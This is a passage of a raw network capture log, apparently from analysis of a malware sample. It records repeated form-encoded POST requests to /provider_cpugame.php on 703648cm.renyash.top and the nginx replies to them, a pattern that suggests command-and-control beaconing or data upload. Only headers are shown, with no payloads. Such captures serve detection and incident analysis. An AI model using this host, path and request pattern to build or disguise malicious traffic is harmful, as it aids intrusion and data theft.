                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:06.254261017 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:06.972044945 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:05 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:06.972897053 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:07.379245996 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:08.099395990 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:06 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:08.100053072 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:08.506885052 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:09.241400003 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:07 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:09.242301941 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:09.648952961 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:10.430258036 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:08 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:10.431032896 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:10.837608099 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:11.277044058 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:09 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:11.279544115 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:11.689166069 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:12.406141043 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:10 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:12.406994104 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:12.813941956 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:13.548434973 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:11 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:13.549207926 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:13.955787897 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:14.672549963 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:12 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:14.673367023 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:15.079718113 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:15.855648041 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:14 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:15.856573105 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:16.263200998 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:17.054038048 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:15 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:17.054867029 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:17.461694002 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:18.190514088 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:16 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:18.195660114 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:18.603946924 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:19.029418945 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:17 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:19.030567884 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:19.437222004 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:20.146260977 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:18 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:20.147113085 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:20.564122915 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:21.349446058 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:19 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:21.350358963 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:21.758316994 CET    25    IN    HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:22.181981087 CET    308    IN    HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:20 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:22.182744026 CET    288    OUT    POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:22.589663982 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:23.016858101 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:21 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:23.017628908 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:23.423892975 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:24.137383938 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:22 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:24.138127089 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:24.545274019 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:25.303221941 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:23 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:25.309279919 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:25.716483116 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:26.447379112 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:24 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:26.457667112 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:26.865591049 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:27.299772978 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:25 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:27.300810099 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:27.707190037 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:28.442058086 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:26 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:28.442929029 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:28.849790096 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:29.329135895 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:27 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:29.330091000 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:29.744195938 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:30.438400030 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:28 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:30.439286947 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:30.846231937 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:31.556838036 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:29 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:31.557864904 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:31.980237007 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:32.692260981 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:32.693217039 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:33.102788925 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:33.824527979 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:33.825690031 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:34.232551098 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:34.938611031 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:33 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:34.939445019 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:35.346198082 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:36.060904026 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:34 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:36.063298941 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:36.470324039 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:37.184969902 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:35 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:37.187195063 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:37.597022057 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:38.013987064 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:36 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:38.014905930 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2192
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:38.422400951 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:39.144129038 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:37 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:39.145720005 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:39.554807901 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:40.273793936 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:38 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:40.274516106 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2220
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:40.690540075 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:41.493748903 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:39 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:41.494767904 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                      Host: 703648cm.renyash.top
                                                                                                                      Content-Length: 2204
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 20, 2024 21:18:41.946945906 CET 25 IN HTTP/1.1 100 Continue
                                                                                                                      Dec 20, 2024 21:18:42.726532936 CET 308 IN HTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 20 Dec 2024 20:18:40 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Content-Length: 152
                                                                                                                      Connection: keep-alive
                                                                                                                      Dec 20, 2024 21:18:42.728425980 CET 288 OUT POST /provider_cpugame.php HTTP/1.1
                                                                                                                      Content-Type: application/x-www-form-urlencoded
